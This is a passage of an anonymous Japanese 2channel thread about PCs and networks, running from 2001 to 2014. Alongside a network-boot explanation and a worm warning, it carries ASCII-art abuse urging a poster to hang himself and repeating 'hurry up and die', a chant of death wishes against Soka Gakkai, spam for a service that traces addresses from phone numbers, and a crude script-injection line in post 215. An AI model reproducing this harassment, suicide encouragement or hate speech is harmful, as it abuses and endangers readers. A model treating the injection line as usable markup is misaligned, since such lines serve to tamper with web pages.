>>180 パソコンのネットワークカードに御茶目なプログラムが
乗ってて、電源入れたときにディスクが使えない OR
使わないとしよう。 そうすっと、
「俺んち何もねーからアドレスくれYO!」とか、
「次何したらいーかわかんねーからおせーて」とか、
とにかく教えてクンモードになっちゃうのが”ろむぶー”
親切などぜう^H^H^H鯖が出てきてこんにちは、ぼっちゃん「あれせい。
これやる」と死ぬまで面倒見てやるってパターン。 うんDOZEだと、
Cドライブまでサーバから共有フォルダになってる
パターンだな。 終わり。
家電とか車なみに普及し、 ユーザがそういう範囲に広がるんなら OSやアプリが書き換え不可能な媒体での運用 というマシンをメーカは真剣に考えるべきだろ。 家電や車をコントロールしてるソフトウエア EPROMその他を媒体としている。 悪意のある部外者が悪意をもったさわり方をしたり 未熟なユーザが誤操作をしても 媒体に書いてある内容が悪い改変を受けることは まあないでしょう。
183 :
ブラックリスト :01/09/22 14:31
騙された・捨てられた・弄ばれた・相手に誠意がない・債権トラブル・不倫疑惑・証拠が欲しい・電話番号などから住所などの詳細を調べて欲しい・等など
何でも気軽に相談下さい。確実に貴方の悩みや困り事、トラブル等を迅速に解決致します。
i-mode・j-sky対応
http://www.black-893.com ★裏社会の会議室が只今、会議中!!!
☆女性事務スタッフ募集中!高収入確実!!!
>>騙された・捨てられた・弄ばれた・相手に誠意がない・ MSの事・?
185 :
名無しさん@お腹いっぱい。 :01/12/28 15:01
さまざまな人がつかいますね
saGe
程よい沈み具合
188 :
名無しさん@お腹いっぱい。 :02/08/27 20:25
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\ Λ_Λ | 君さぁ こんなスレッド立てるから | ( ´∀`)< 厨房って言われちゃうんだよ | ( ΛΛ つ >―――――――――――――――――――‐< ( ゚Д゚) < おまえのことを必要としてる奴なんて | /つつ | いないんだからさっさと回線切って首吊れ | \____________________/ (-_-) ハヤクシンデネ… (-_-) ハヤクシンデネ… (-_-) ハヤクシンデネ… (∩∩) (∩∩) (∩∩) (-_-) ハヤクシンデネ… (-_-) ハヤクシンデネ… (-_-) ハヤクシンデネ… (∩∩) (∩∩) (∩∩) (-_-) ハヤクシンデネ… (-_-) ハヤクシンデネ… (-_-) ハヤクシンデネ… (∩∩) (∩∩) (∩∩)
(^^)
(^^)
∧_∧ ( ^^ )< ぬるぽ(^^)
∧_∧ ピュ.ー ( ^^ ) <これからも僕を応援して下さいね(^^)。 =〔~∪ ̄ ̄〕 = ◎――◎ 山崎渉
__∧_∧_ |( ^^ )| <寝るぽ(^^) |\⌒⌒⌒\ \ |⌒⌒⌒~| 山崎渉 ~ ̄ ̄ ̄ ̄
∧_∧ ∧_∧ ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。 =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕 = ◎――――――◎ 山崎渉&ぼるじょあ
(⌒V⌒) │ ^ ^ │<これからも僕を応援して下さいね(^^)。 ⊂| |つ (_)(_) 山崎パン
197 :
名無しさん@お腹いっぱい。 :03/08/25 16:12
このファイルはウイルスに感染しています。次のオプションから選択してください。 感染した添付ファイルからウイルスを駆除するため、MSN 有料サービスにサインアップする。 (推奨). 注意 : 駆除できないウイルスおよびその亜種が存在する可能性があります。 ウイルスに感染したファイルをダウンロードする。 感染したウイルスが原因でコンピュータが損傷を受けた場合、Hotmail では責任を負いかねます。
198 :
名無しさん@お腹いっぱい。 :03/08/25 16:30
199 :
名無しさん@お腹いっぱい。 :03/11/19 01:30
age
test
自動的にサインインにチェック入れてなかったのに勝手にサインインされるんですが・・。 自分しかさわれないPCなのに。。。
202 :
ウイルス :05/01/23 14:27:29
やばい、変なとこ押したら本体がすごい音出した
203 :
ウイルス :05/01/23 14:28:00
やばい、変なとこ押したら本体がすごい音出した
204 :
名無しさん@お腹いっぱい。 :05/01/23 22:20:13
;-:=:=ー- ー=;-;-;-;, , _ ヽヽ ,; ';";; ;;`-' '"" ,;="ヽ_ ; ; ;:丶 ,,_ !;_<" _o从o_ + /; / ,,.;- , )) (( (; ; ";''-ヽ 丶,, + /'''' ''''' \ +//-;';";" / , -"'' -';;";;' ー:ニ;r'(●), 、(●)ヽ//,,-;''" ,,-"-=-, ' -";;;"' -; ,二',-:(;;; ;;; ,,ノ(、_, )ヽ、,,ヽ;; ;);" ',, - 二-- '' "_ノ ,ー"';--;;,;;_,二| ;; ;; `-=ニ=- ';;);: ;;; ;| ""二"--,-二"" "'' '-;- ;;:;__ ,,,ヽ;;; ; ;:`ニニ´:::; ;;; ;; ;丿'""二二;---" ヾヽ, ,,- ="'--==,;;__;;,==--',' '''=二,,_,/i
205 :
名無しさん@お腹いっぱい。 :05/03/07 08:21:21
今イギリスでBropiaの亜種が猛威を振るってる(MSN Messenger媒介感染) ニポーン上陸はすぐだろうからもまいら用心汁
206 :
205 :05/03/07 08:31:18
>>202 ソレダ! ウイルスハケーン!!! <Bropia亜種
208 :
名無しさん@お腹いっぱい。 :2005/10/30(日) 15:20:42
ホシュ
セフレ募集です><
210 :
名無しさん@お腹いっぱい。 :2006/05/03(水) 01:05:44
保守
211 :
名無しさん@お腹いっぱい。 :2006/06/03(土) 00:08:23
212 :
名無しさん@お腹いっぱい。 :2006/09/28(木) 23:37:39
記念真紀子
213 :
名無しさん@お腹いっぱい。 :2008/01/09(水) 22:43:06
今時、トップページに”ダンカン”なんて訳のわからない下賤なパーソナリティを定期的にアップし続けてるとか、あり得ないですw 今時、珍しいくらいに”意固地”で”偏向的”な感性の集まりって感じw
214 :
名無しさん@お腹いっぱい。 :2009/09/07(月) 11:26:08
215 :
名無しさん@お腹いっぱい。 :2010/09/04(土) 17:47:27
document.write("<body onload=window();>")
218 :
名無しさん@お腹いっぱい。 :2012/04/15(日) 23:18:02.81
test
創,価 死,ね 創,価 死,ね 創,価 死,ね 創,価 死,ね 創,価 死,ね 創,価 死,ね 創,価 死,ね 創,価 死,ね 創,価 死,ね 創,価 死,ね 創,価 死,ね
220 :
名無しさん@お腹いっぱい。 :
2014/08/08(金) 10:49:13.10 ★2ch勢いランキングサイトリスト★ ☆ +ニュース ・ 2NN ・ 2chTimes ☆ +ニュース新着 ・ 2NN新着 ・ Headline BBY ・ Unker ☆ +ニュース他 ・ Desktop2ch ・ 記者別一覧 ☆ 全板 ・ 全板縦断勢いランキング ・ スレッドランキング総合ランキング ☆ 実況込み ・ 2勢 ・ READ2CH ・ i-ikioi ※ 要サイト名検索